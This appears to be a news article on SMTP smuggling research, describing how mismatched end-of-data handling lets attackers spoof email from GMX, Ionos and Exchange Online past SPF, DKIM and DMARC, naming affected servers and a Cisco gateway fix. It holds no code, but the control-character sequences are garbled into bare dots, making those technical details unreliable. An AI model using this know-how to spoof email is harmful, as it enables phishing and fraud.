SMTP smuggling enables email spoofing while passing security checks

Longin identified two big email providers whose SMTP servers interpreted . as the end of data: Fastmail and Runbox. However, he also found that popular SMTP server software like Postfix and Sendmail were also accepting this end-of-data sequence in their default configurations. According to Shodan scans, more than 1.5 million publicly accessible SMTP servers use Postfix and Sendmail.

The researcher now had the ability to spoof any GMX identities to users of any of these vulnerable SMTP servers in a way where the messages would pass SPF, DKIM and DMARC validation because they were delivered through the real GMX SMTP server without being blocked.

The issue was worse, because GMX also runs the web.de domain and is also a subsidiary of Ionos, a large web hosting company. It turns out Ionos’s SMTP servers ran the same custom software as GMX’s and were therefore also allowing outbound email messages with . sequences. Furthermore, the default SPF records for Ionos-hosted domains and GMX had overlapping IP addresses, meaning that attackers could use their GMX account to spoof messages from any of the 1.35 million domain names that used Ionos’ email servers, while still passing security checks.

Like GMX and Ionos, another SMTP provider that allowed outbound emails with . was Outlook and Microsoft Exchange Online. This meant that attackers could spoof valid messages from any of the millions of domains that listed Exchange Online’s SMTP servers in their SPF records.

However, the impact was more limited because Outlook and Exchange Online use the BDAT (or chunking) command to send messages by default. This is an SMTP feature that specifies the exact message length in bytes instead of relying on end-of-data sequences and it makes SMTP smuggling impossible. However, there’s a fallback mechanism because not all receiving SMTP servers support BDAT. For those that don’t, the Exchange servers will fall back to using the regular DATA command to send messages.

To be vulnerable to spoofing via Exchange Online messages, an incoming SMTP server needs to meet two conditions instead of one: Not support BDAT and interpret . as an end-of-data sequence. This was the case for Fastmail and remains the case for hundreds of thousands of Postfix and Sendmail deployments. Microsoft has since addressed the problem and messages with . sequences are no longer allowed via Outlook and Exchange Online.

Cisco Secure Email settings could allow SMTP smuggling

While testing other exotic end-of-data sequences against inbound SMTP servers of the former Alexa top 1,000 domains, Longin found several high-profile domains that accepted . as an end-of-data sequence. The domains included Amazon, PayPal, eBay, Cisco, the IRS, IMDb, and Audible.

All those domains were using Cisco’s Secure Email service with on-premises deployments of Cisco Secure Email Gateway or the cloud-based Cisco Secure Email Cloud Gateway. The Cisco Secure Email Gateway can be thought of as a proxy server that checks emails for malicious content before passing them to the user’s real SMTP email server. The software has a configuration option for how to handle messages that contain bare carriage return (CR) or line feed (LF) characters with three settings: Clean, Reject, or Allow.

The behavior of the “clean” setting, which is the default one, consists of converting bare CR or LF characters into CRLF characters meaning that . will be converted into . and this is a valid end-of-data sequence for all SMTP servers because it’s the equivalent of .. So, if you run an SMTP server that only accepts . as end-of-data sequence, as it should, and you put Cisco Secure Email Gateway with default settings in front of it, you just made it vulnerable to SMTP smuggling.

SEC Consult advises Cisco Secure Email Gateway users to change this setting from “Clean” to “Allow” so that messages with . are forwarded without modification to their SMTP servers, which should then reject them. Outbound SMTP servers that don’t filter . and will allow outbound emails with this sequence inside include Outlook/Exchange Online, iCloud, on-premises Microsoft Exchange servers, Postfix, Sendmail, Startmail, Fastmail, and Zohomail.